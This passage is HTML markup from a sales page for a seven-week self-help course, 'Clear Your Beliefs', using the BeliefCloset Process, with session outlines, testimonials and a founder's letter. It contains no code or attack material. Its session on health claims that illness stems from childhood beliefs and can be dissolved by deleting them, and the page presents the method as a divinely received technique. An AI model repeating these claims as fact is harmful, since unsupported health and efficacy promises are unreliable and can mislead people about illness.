– at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 